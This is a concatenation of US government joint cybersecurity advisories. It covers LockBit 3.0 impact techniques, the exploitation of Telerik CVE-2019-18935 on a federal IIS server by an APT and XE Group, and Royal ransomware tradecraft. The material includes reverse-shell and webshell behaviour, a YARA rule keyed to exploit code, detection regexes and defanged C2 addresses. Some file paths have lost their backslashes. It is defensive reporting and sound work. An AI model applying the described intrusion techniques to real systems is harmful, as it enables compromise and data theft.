Data Destruction | T1485 | LockBit 3.0 deletes log files and empties the recycle bin. |
Data Encrypted for Impact | T1486 | LockBit 3.0 encrypts data on target systems to interrupt availability to system and network resources. |
Service Stop | T1489 | LockBit 3.0 terminates processes and services. |
Inhibit System Recovery | T1490 | LockBit 3.0 deletes volume shadow copies residing on disk. |
Defacement: Internal Defacement | T1491.001 | LockBit 3.0 changes the host system’s wallpaper and icons to the LockBit 3.0 wallpaper and icons, respectively. |
The FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of LockBit 3.0’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The FBI, CISA, and the MS-ISAC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be legally shared, including:
The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at report@cisa.gov. State, local, tribal, and territorial (SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).
The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.
From November 2022 through early January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and authoring organizations identified the presence of indicators of compromise (IOCs) at a federal civilian executive branch (FCEB) agency. Analysts determined that multiple cyber threat actors, including an APT actor, were able to exploit a .NET deserialization vulnerability (CVE-2019-18935) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency’s Microsoft Internet Information Services (IIS) web server. Successful exploitation of this vulnerability allows for remote code execution. According to Progress Software, Telerik UI for ASP.NET AJAX builds before R1 2020 (2020.1.114) are vulnerable to this exploit.[1]
Actions to take today to mitigate malicious cyber activity:
CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.
Download the PDF version of this report:
For a downloadable copy of IOCs, see
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding detection and mitigation recommendations.
CISA and authoring organizations assess that, beginning as late as November 2022, threat actors successfully exploited a .NET deserialization vulnerability (CVE-2019-18935) in an instance of Telerik UI for ASP.NET AJAX Q2 2013 SP1 (version 2013.2.717) running on an FCEB agency’s Microsoft IIS server. This exploit, which results in interactive access with the web server, enabled the threat actors to successfully execute remote code on the vulnerable web server. Though the agency’s vulnerability scanner had the appropriate plugin for CVE-2019-18935, it failed to detect the vulnerability due to the Telerik UI software being installed in a file path it does not typically scan. This may be the case for many software installations, as file paths widely vary depending on the organization and installation method.
In addition to CVE-2019-18935, this version (2013.2.717) of Telerik UI for ASP.NET AJAX contains the following known vulnerabilities: CVE-2017-11357, CVE-2017-11317, and CVE-2017-9248. Analysis suggests that cyber threat actors exploited CVE-2019-18935 in conjunction with either CVE-2017-11357 or CVE-2017-11317. Australian Cyber Security Centre (ACSC) Advisory 2020-004 assesses that exploitation of CVE-2019-18935 is only possible with knowledge of Telerik RadAsyncUpload encryption keys.[2] Threat actors can obtain these keys through either prior knowledge or exploitation of vulnerabilities—CVE-2017-11357 or CVE-2017-11317—present in older, unpatched versions of Telerik released between 2007 and 2017. Forensic evidence is not available to definitively confirm exploitation of either CVE-2017-11357 or CVE-2017-11317.
CISA and authoring organizations observed multiple cyber threat actors, including an APT actor—hereafter referred to as Threat Actor 1 (TA1)—and known cybercriminal actor XE Group—hereafter referred to as Threat Actor 2 (TA2)—conducting reconnaissance and scanning activities [T1595.002] that correlate to the successful exploitation of CVE-2019-18935 in the agency’s IIS server running Telerik UI for ASP.NET AJAX [T1190].
When exploiting the vulnerability, the threat actors uploaded malicious dynamic-link library (DLL) files (some masqueraded as portable network graphics [PNG] files) [T1105] to the C:WindowsTemp
directory. The malicious files were then executed from the C:WindowsTemp
directory via the w3wp.exe
process—a legitimate process that runs on IIS servers. This process is routine for handling requests sent to web servers and delivering content. The review of antivirus logs identified that some DLL files were created [T1055.001] and detected as early as August 2021.
CISA and authoring organizations confirmed that some malicious files dropped on the IIS server are consistent with a previously reported file naming convention that threat actors commonly use when exploiting CVE-2019-18935.[3] The threat actors name the files in the Unix Epoch time format and use the date and time as recorded on the target system. The file naming convention follows the pattern [10 digits].[7 digits].dll
(e.g., a file created on October 31, 2022, could be 1667203023.5321205.dll
).
The names of some of the PNG files were misleading. For example, file 1596835329.5015914.png
, which decodes to August 7, 2020, 21:22:09 UTC, first appeared on October 13, 2022, but the file system shows a creation date of August 7, 2020. The uncorrelated Unix Epoch time format may indicate that the threat actors used the timestomping [T1070.006] technique. This file naming convention is a primary IOC used by the threat actors.
In many cases, malicious artifacts were not available for analysis because the threat actors’ malware—that looks for and removes files with the .dll file extension—removed files [T1070.004] from the C:WindowsTemp
directory. Through full packet data capture analysis and reverse engineering of malicious DLL files, no indications of additional malicious activity or sub-processes were found executed by the w3wp.exe
process. CISA observed error messages being sent to the threat actors’ command and control (C2) server when permission restraints prevented the service account from executing the malicious DLLs and writing new files.
Network activity analysis was consistent with the artifacts provided for review. Analysts did not observe evidence of privilege escalation or lateral movement.
CISA and authoring organizations observed TA1 exploiting CVE-2019-18935 for system enumeration beginning in August 2022. The vulnerability allows a threat actor to upload malicious DLLs on a target system and execute them by abusing a legitimate process, e.g., the w3wp.exe
process. In this instance, TA1 was able to upload malicious DLL files to the C:WindowsTemp directory and then achieve remote code execution, executing the DLL files via the w3wp.exe process.
At least nine DLL files used for discovery [TA0007], C2 [TA0011], and defense evasion [TA0005]. All of the analyzed samples have network parameters, including host name, domain name, Domain Name System (DNS) server Internet Protocol (IP) address and machine name, Network Basic Input/Output System (NetBIOS) ID, adapter information, IP address, subnet, gateway IP, and Dynamic Host Configuration Protocol (DHCP) server [T1016]. All analyzed samples communicate this collected data to a C2 server at IP address 137.184.130[.]162
or 45.77.212[.]12
. The C2 traffic to these IP addresses uses a non-application layer protocol [T1095] by leveraging Transmission Control Protocol (TCP) clear text (i.e., unencrypted) over port 443. Analysis also identified that:
.dll
extension in the C:WindowsTemp
directory on the server. TA1 may use this capability to hide additional malicious activity on the network.CISA, in coordination with the authoring organizations, identified and observed the following threat actor IPs and timestamps associated with this activity:
IP Address |
First Identified |
Last Identified |
137.184.130[.]162 |
09/26/2022 |
10/08/2022 |
45.77.212[.]12 |
10/07/2022 |
11/25/2022 |
104.225.129[.]102 |
10/10/2022 |
11/16/2022 |
149.28.85[.]24 |
10/12/2022 |
10/17/2022 |
185.186.245[.]72 |
10/18/2022 |
10/18/2022 |
193.8.172[.]113 |
09/25/2022 |
09/25/2022 |
193.8.172[.]13 |
09/25/2022 |
10/17/2022 |
216.120.201[.]12 |
10/13/2022 |
11/10/2022 |
5.34.178[.]246 |
09/25/2022 |
09/25/2022 |
79.133.124[.]242 |
09/25/2022 |
09/25/2022 |
92.38.169[.]193 |
09/27/2022 |
10/08/2022 |
92.38.176[.]109 |
09/12/2022 |
09/25/2022 |
92.38.176[.]130 |
09/25/2022 |
10/07/2022 |
TA2—identified as likely the cybercriminal actor XE Group—often includes xe[word]
nomenclature in original filenames and registered domains. Volexity lists this naming convention and other observed TTPs as common for this threat actor group.[4]
As early as August 2021, CISA and authoring organizations observed TA2 delivering malicious PNG files that, following analysis, were masqueraded DLL files to avoid detection [T1036.005]. Similar to TA1, TA2 exploited CVE-2019-18935 and was able to upload at least three unique DLL files into the C:WindowsTemp
directory that TA2 executed via the w3wp.exe
process. These DLL files drop and execute reverse (remote) shell utilities for unencrypted communication with C2 IP addresses associated with the malicious domains listed in Table 2. Note: At the time of analysis, the domains resolved to the listed IP addresses.
IP Address |
Resolving Domains |
---|---|
184.168.104[.]171 |
xework[.]com xegroups[.]com hivnd[.]com |
144.96.103[.]245 |
xework[.]com |
Analysis of DLL files determined the files listed in Table 3 were dropped, decoded, and attempted to connect to the respective malicious domains. Embedded payloads dropped by the DLL files were observed using the command line utility certutil[.]exe
and writing new files as xesvrs[.]exe
to invoke reverse shell utilities execution.
Filename |
Description |
---|---|
XEReverseShell.exe |
DLL files (masqueraded as PNG files) located in the When executed, the reverse shell utility attempts to connect to Note: It is likely the threat actors changed the file extension from .dll to .png to avoid detection. |
Multi-OS_ReverseShell.exe |
Reverse shell utility decoded from the base64 encoded file When executed, it will attempt to connect to |
SortVistaCompat |
Base64 encoded payload dropped from |
When the TA2 malware is executed a DLL file drops an executable (XEReverseShell.exe
) that attempts to pull a C2 IP address and port number from xework[.]com
or xegroups[.]com
.
If communication is established between the TA2 malware and the C2:
xesetshell
, causing the malware to connect to the server and download a file called small.txt—a base64-encoded webshell that the malware decodes and places in the C:WindowsTemp
directory.xequit
, causing the malware to sleep for a period of time determined by the threat actors.The two files xesmartshell.tmp
and SortVistaCompat
have the capability to drop an Active Server Pages (ASPX) webshell—a base64 encoded text file small.txt
decoded [T1140] as small.aspx
[T1505.003]—to enumerate drives; to send, receive, and delete files; and to execute incoming commands. The webshell contains an interface for easily browsing files, directories, or drives on the system, and allows the user to upload or download files to any directory. No webshells were observed to be dropped on the target system, likely due to the abused service account having restrictive write permissions.
For more information on the DLLs, binaries, and webshell, see CISA MAR-10413062-1.v1 Telerik Vulnerability in U.S. Government IIS Server.
See Table 4 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.
Reconnaissance |
||
---|---|---|
ID |
Use |
|
Active Scanning: Vulnerability Scanning |
Actors were observed conducting active scanning activity for vulnerable devices and specific ports. |
|
Initial Access |
||
Technique Title |
ID |
Use |
Exploit Public-Facing Application |
Actors exploited a known vulnerability in the Microsoft IIS server. |
|
Persistence |
||
Technique Title |
ID |
Use |
Server Software Component: Web Shell |
TA2’s malware dropped an ASPX webshell to enumerate drives; send, receive, and delete files; and execute commands. |
|
Defense Evasion |
||
Technique Title |
ID |
Use |
Masquerading: Match Legitimate Name or Location |
Actors leveraged the legitimate |
|
Process Injection: DLL Injection |
Actors loaded newly created DLLs into a running |
|
Indicator Removal: File Deletion |
TA1’s malware deleted files with ".dll" from the |
|
Indicator Removal: Timestomp |
Actors modified file time attributes to insert misleading creation dates. |
|
Decode Files |
The base64 encoded text file |
|
Discovery |
||
Technique Title |
ID |
Use |
File and Directory Discovery |
Actors enumerated the IIS server via OS fingerprinting, executed Windows processes, and collected network information. TA1’s malware enumerates systems, processes, files, and directories. |
|
System Network Configuration Discovery |
TA1’s malware gathers network parameters, including host name, domain name, DNS servers, NetBIOS ID, adapter information, IP address, subnet, gateway IP, and DHCP server. |
|
Command and Control |
||
Technique Title |
ID |
Use |
Ingress Tool Transfer |
TA1 and TA2 uploaded malicious DLL files (some masqueraded as PNG files) to the |
|
Non-Application Layer Protocol |
Actors used a non-application layer protocol (TCP) for |
CISA and authoring organizations recommend that organizations review the steps listed in this section and Table 4: Identified ATT&CK Techniques for Enterprise to detect similar activity on IIS servers.
CISA developed the following YARA rule from the base proof-of-concept code for CVE-2019-18935.[5] Note: Authoring organizations do not guarantee all malicious DLL files (if identified) will use the same code provided in this YARA rule.
rule CISA_10424018_01 {
meta:
Author = "CISA Code & Media Analysis"
Incident = "10424018"
Date = "2023-02-07"
Last_Modified = "20230216_1500"
Actor = "n/a"
Family = "n/a"
Capabilities = "n/a"
Malware_Type = "n/a"
Tool_Type = "n/a"
Description = "Detects open-source exploit samples"
SHA256 = "n/a"
strings:
$s0 = { 3D 20 7B 20 22 63 6D 22 2C 20 22 64 2E 65 22 2C }
$s1 = { 20 22 78 22 2C 20 22 65 22 20 7D 3B }
$s2 = { 52 65 76 65 72 73 65 53 68 65 6C 6C 28 29 }
$s3 = { 54 65 6C 65 72 69 6B 20 55 49 }
$s4 = { 66 69 6C 65 6E 61 6D 65 5F 6C 6F 63 61 6C }
$s5 = { 66 69 6C 65 6E 61 6D 65 5F 72 65 6D 6F 74 65 }
$s6 = { 41 55 43 69 70 68 65 72 2E 65 6E 63 72 79 70 74 }
$s7 = { 31 32 31 66 61 65 37 38 31 36 35 62 61 33 64 34 }
$s8 = { 43 6F 6E 6E 65 63 74 53 74 61 67 69 6E 67 53 65 72 76 65 72 28 29 }
$s9 = { 53 74 61 67 69 6E 67 53 65 72 76 65 72 53 6F 63 6B 65 74 }
$s10 = { 2A 62 75 66 66 65 72 20 3D 20 28 75 6E 73 69 67 6E 65 }
$s11 = { 28 2A 29 28 29 29 62 75 66 66 65 72 3B 0A 20 20 20 20 66 75 6E 63 28 29 3B }
$s12 = { 75 70 6C 6F 61 64 28 70 61 79 6C 6F 61 64 28 54 65 6D 70 54 61 72 67 65 74 }
$s13 = { 36 32 36 31 36 66 33 37 37 35 36 66 32 66 }
condition:
($s0 and $s1 and $s2) or ($s3 and $s4 and $s5 and $s6 and $s7) or ($s8 and $s9 and $s10 and $s11) or ($s12 and $s13)
}
CISA, FBI, and MS-ISAC recommend that organizations utilize a centralized log collection and monitoring capability, as well as implement or increase logging and forensic data retention. Longer retention policies improve the availability of data for forensic analysis and aid thorough identification of incident scope.
CISA, FBI, and MS-ISAC recommend that organizations use process monitoring—which provides visibility into file system and application process activity—to detect suspicious executable files running from the C:WindowsTemp
directory. Process monitoring via Windows Event Code 4688 will detect the legitimate w3wp.exe
process running suspicious DLL files and other anomalous child processes. Note: Enabling this event may inundate security event logging. Use centralized log collection to prevent log rollover, increase log retention and archiving, and/or enable command line event logging.
Forensic analysis commonly identified the threat actors taking the following steps:
C:WindowsTemp1665890187.8690152.dll
) by process w3wp.exe
PID 6484.w3wp.exe
PID 6484. w3wp.exe
PID 6484 to 45.77.212[.]12
over port 443.C:WindowsSystem32vcruntime140.dll
(Windows C runtime library) to execute payload.Steps 1 and 2 occur every time a malicious DLL file is created. In some cases, an ASP .NET temp file was created, but this may have indicated benign IIS server activity. Note: The Process ID (PID) used in this example is unique to this investigation and is not universal. IP address 45.77.212[.]12
correlates to TA1, but the pattern can be used as general practice to identify similar activity.
The following information was derived from artifact analysis and is provided to equip IT infrastructure defenders searching for similar activity on an IIS server. Several artifacts can be referenced to assist in determining if CVE-2019-18935 has been successfully exploited.
When this CVE is exploited, it uploads malicious DLL files to the C:WindowsTemp
directory. The malicious DLL file naming convention translates to the exact time the file was uploaded to the server.
The time is represented in a series of digits, known as Unix Epoch time. The files observed during this investigation contained two sets of digits separated by a period (.) before the DLL extension (.dll). Example: 1667206973.2270932.dll
Nearly all recovered files contain a series of 10 digits to the left of the period (.) and seven digits to the right. However, one file contained only five digits in the second set, which should be taken into consideration when writing regex patterns to search for the existence of these files. Example Regex: d{10}.d{1,8}.dll
These numbers can be copied and translated from digits into readable language with the month, day, year, hour, minute, and seconds displayed.
When investigating IIS logs, specific fields were searched for and captured during the time of each connection.
If the Unix Epoch time signature has been translated from a DLL filename, specific logs can be searched based on that time. However, if the Unix Epoch time signature has not been translated, the following will still work, but may take longer for the query to run.
The four most important fields to identify this traffic are noted in the following table. These descriptions are sourced directly from Microsoft.[6]
General Name |
Field Name |
Description |
Method |
cs-method |
Requested action; for example, a GET method |
URI Stem |
cs-uri-stem |
Universal Resource Identifier (URI), or target, of the action |
URI Query |
cs-uri-query |
The query, if any, that the client was trying to perform; A URI query is necessary only for dynamic pages. |
Protocol Status |
sc-status |
Hypertext Transfer Protocol (HTTP) or File Transfer Protocol (FTP) status code |
Note: Depending on how logs are collected and stored, the field names may not be an exact match; this should be taken into consideration when constructing queries.
When ingesting logs into security information and event management (SIEM), the final field names did not use a hyphen (-) but used an underscore (_).
Example: cs_method instead of cs-method
Field Name |
Artifact |
---|---|
cs-method |
POST |
>cs-uri-stem |
/Telerik.Web.UI.WebResource.axd |
cs-uri-query |
type=rau |
sc-status |
200 and 302 |
When reviewing logs, two IIS events were observed with the same timestamp each time this CVE-2019-18935 was exploited. Both events contained the same information in the cs-method, cs-uri-stem, and cs-uri-query. One event had a sc-status of 200 and the other had a sc-status of 302.
Kroll Artifact Parser and Extractor (KAPE), a forensic artifact collector and parser, was used to extract the Windows event logs from a backup image of the compromised IIS server. All field names refer to the labels provided via KAPE exports. The strings are of value and can be used to locate other artifacts if different tools are used. Note: The payload data in the following table has been shortened to only necessary strings to obscure and protect victim information.
EventID |
Payload |
---|---|
1309 |
3005, An unhandled exception has occurred[*redacted*]w3wp.exe[*redacted*]InvalidCastException, Unable to cast object of type 'System.Configuration.Install.AssemblyInstaller' to type 'Telerik.Web.UI.IAsyncUploadConfiguration'.n at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)nn, [*redacted*]/Telerik.Web.UI.WebResource.axd?type=rau, /Telerik.Web.UI.WebResource.axd, [*redacted*], False, [*redacted*], 15, [*redacted*], False, at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)n","Binary":""}} |
Authoring organizations recommend looking for the following key strings in the payload:
w3wp.exe
: This is the parent process that executes the code inside the malicious DLLs.System.Configuration.Install.AssemblyInstaller
: Figure 1 is from the creator’s GitHub repo,[7] where the string can be observed in the code. As presented by Bishop Fox and proven during authoring organizations’ investigation of IIS server logs, an exception does not mean that the exploit failed, but more likely that it executed successfully.[3]If a Werfault crash report was written, Windows event application logs may contain evidence of this— even if the DLLs have been removed from the system as part of a cleanup effort by the threat actors.
EventID |
ExecutableInfo |
MapDescription |
Payload |
---|---|---|---|
1000 |
w3wp.exe |1664175639.65719.dll |c:windowssystem32inetsrvw3wp.exe |C:WindowsTemp1664175639.65719.dll |
Application Error |
{"EventData":{"Data":"w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, 1708, 01d8d0a5f84af443, c:\windows\system32\inetsrv\w3wp.exe, C:\Windows\Temp\1664175639.65719.dll, eed89eeb-3d68-11ed-817c-005056990ed7","Binary":""}} |
1001 |
w3wp.exe |1664175639.65719.dll |C:ProgramDataMicrosoftWindowsWERReportQueueAppCrash_w3wp.exe |C:ProgramDataMicrosoftWindowsWERReportQueueAppCrash_w3wp.exe |C:ProgramDataMicrosoftWindowsWERReportQueueAppCrash_w3wp.exe |
Application Crash |
{"EventData":{"Data":"0, APPCRASH, Not available, 0, w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, nC:\Windows\Temp\WERE3F6.tmp.appcompat.txtnC:\Windows\Temp\WERE639.tmp.WERInternalMetadata.xmlnC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\memory.hdmpnC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\triagedump.dmp, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656, 0, eed89eeb-3d68-11ed-817c-005056990ed7, 4","Binary":""}} |
The EventID field maps to Windows EventIDs for an easy filter. Users can leverage the Windows EventIDs to find malicious DLL with the Unix Epoch time-based name inside the C:WindowsTemp directory.
Depending how log analysis is performed, various filters can be determined. However, if regex is available, the example listed in Table 8 above can be reused to match the Unix Epoch timestamp convention to assist in filtering.
When evidence of malicious DLLs is found, reverse engineering will need to be conducted to fully understand what actions occur as the malicious files could do nearly anything. Leveraging Windows security event logs, as well as Windows PowerShell logs, may provide insight into what actions the DLLs are taking. CISA and authoring organizations recommend the following process:
w3wp.exe
in Windows security event logs (e.g., Windows EventID 4688 New Process created).If Trellix XDR Platform is deployed in an environment and a standard HX triage audit is completed in a timely manner of the suspected use of CVE-2019-18935, an organization can search for file write events from known web processes. This will identify the executables written by the web server process. CISA and authoring organizations specifically recommend searching for the following field value pair:
Field |
Value Begins With |
---|---|
TextAtLowestOffset |
MZ |
Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA, FBI, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
[1] Telerik: Exploiting .NET JavaScriptSerializer Deserialization (CVE-2019-18935)
[2] ACSC Advisory 2020-004
[3] Bishop Fox CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI
[4] Volexity Threat Research: XE Group
[5] GitHub: Proof-of-Concept Exploit for CVE-2019-18935
[6] Microsoft: Configure Logging in IIS
[7] GitHub: CVE-2019-18935
Google’s Threat Analysis Group (TAG) contributed to this CSA.
Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we'd welcome your feedback.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.
Since approximately September 2022, cyber criminals have compromised U.S. and international organizations with a Royal ransomware variant. FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used “Zeon” as a loader. After gaining access to victims’ networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems. Royal actors have made ransom demands ranging from approximately $1 million to $11 million USD in Bitcoin. In observed incidents, Royal actors do not include ransom amounts and payment instructions as part of the initial ransom note. Instead, the note, which appears after encryption, requires victims to directly interact with the threat actor via a .onion
URL (reachable through the Tor browser). Royal actors have targeted numerous critical infrastructure sectors including, but not limited to, Manufacturing, Communications, Healthcare and Public Healthcare (HPH), and Education.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
Royal ransomware uses a unique partial encryption approach that allows the threat actor to choose a specific percentage of data in a file to encrypt. This approach allows the actor to lower the encryption percentage for larger files, which helps evade detection.[1] In addition to encrypting files, Royal actors also engage in double extortion tactics in which they threaten to publicly release the encrypted data if the victim does not pay the ransom.
Royal actors gain initial access to victim networks in a number of ways including:
Once Royal actors gain access to the network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold in the victim’s network. Ransomware operators often use open-source projects to aid their intrusion activities; Royal operators have recently been observed using Chisel
, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI has observed multiple Qakbot C2s used in Royal ransomware attacks, but has not yet determined if Royal ransomware exclusively uses Qakbot C2s.
Royal actors often use RDP to move laterally across the network [T1021.001]. Microsoft Sysinternals tool PsExec
has also been used to aid lateral movement. FBI has observed Royal actors using remote monitoring and management (RMM) software, such as AnyDesk, LogMeIn, and Atera, for persistence in the victim’s network [T1133]. In some instances, the actors moved laterally to the domain controller. In one confirmed case, the actors used a legitimate admin account to remotely log on to the domain controller [T1078]. Once on the domain controller, the threat actor deactivated antivirus protocols [T1562.001] by modifying Group Policy Objects [T1484.001].
Royal actors exfiltrate data from victim networks by repurposing legitimate cyber pentesting tools, such as Cobalt Strike, and malware tools and derivatives, such as Ursnif/Gozi, for data aggregation and exfiltration. According to third-party reporting, Royal actors’ first hop in exfiltration and other operations is usually a U.S. IP address.
Note: In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at IP: 94.232.41[.]105 in December 2022.
Before starting the encryption process, Royal actors:
vssadmin.exe
) to delete shadow copies to prevent system recovery.[1] FBI has found numerous batch (.bat
) files on impacted systems which are typically transferred as an encrypted 7zip file. Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion—including Application, System, and Security event logs [T1070.001].
Malicious files have been found in victim networks in the following directories:
C:Temp
C:UsersAppDataRoaming
C:Users
C:ProgramData
See table 1 and 2 for Royal ransomware IOCs that FBI obtained during threat response activities as of January 2023. Note: Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.
IOC |
Description |
---|---|
.royal |
Encrypted file extension |
README.TXT |
Ransom note |
Malicious IP |
Last Activity |
102.157.44[.]105 |
November 2022 |
105.158.118[.]241 |
November 2022 |
105.69.155[.]85 |
November 2022 |
113.169.187[.]159 |
November 2022 |
134.35.9[.]209 |
November 2022 |
139.195.43[.]166 |
November 2022 |
139.60.161[.]213 |
November 2022 |
148.213.109[.]165 |
November 2022 |
163.182.177[.]80 |
November 2022 |
181.141.3[.]126 |
November 2022 |
181.164.194[.]228 |
November 2022 |
185.143.223[.]69 |
November 2022 |
186.64.67[.]6 |
November 2022 |
186.86.212[.]138 |
November 2022 |
190.193.180[.]228 |
November 2022 |
196.70.77[.]11 |
November 2022 |
197.11.134[.]255 |
November 2022 |
197.158.89[.]85 |
November 2022 |
197.204.247[.]7 |
November 2022 |
197.207.181[.]147 |
November 2022 |
197.207.218[.]27 |
November 2022 |
197.94.67[.]207 |
November 2022 |
23.111.114[.]52 |
November 2022 |
41.100.55[.]97 |
November 2022 |
41.107.77[.]67 |
November 2022 |
41.109.11[.]80 |
November 2022 |
41.251.121[.]35 |
November 2022 |
41.97.65[.]51 |
November 2022 |
42.189.12[.]36 |
November 2022 |
45.227.251[.]167 |
November 2022 |
5.44.42[.]20 |
November 2022 |
61.166.221[.]46 |
November 2022 |
68.83.169[.]91 |
November 2022 |
81.184.181[.]215 |
November 2022 |
82.12.196[.]197 |
November 2022 |
98.143.70[.]147 |
November 2022 |
140.82.48[.]158 |
December 2022 |
147.135.36[.]162 |
December 2022 |
147.135.11[.]223 |
December 2022 |
152.89.247[.]50 |
December 2022 |
172.64.80[.]1 |
December 2022 |
179.43.167[.]10 |
December 2022 |
185.7.214[.]218 |
December 2022 |
193.149.176[.]157 |
December 2022 |
193.235.146[.]104 |
December 2022 |
209.141.36[.]116 |
December 2022 |
45.61.136[.]47 |
December 2022 |
45.8.158[.]104 |
December 2022 |
5.181.234[.]58 |
December 2022 |
5.188.86[.]195 |
December 2022 |
77.73.133[.]84 |
December 2022 |
89.108.65[.]136 |
December 2022 |
94.232.41[.]105 |
December 2022 |
47.87.229[.]39 |
January 2023 |
Malicious Domain |
Last Observed |
ciborkumari[.]xyz |
October 2022 |
sombrat[.]com |
October 2022 |
gororama[.]com |
November 2022 |
softeruplive[.]com |
November 2022 |
altocloudzone[.]live |
December 2022 |
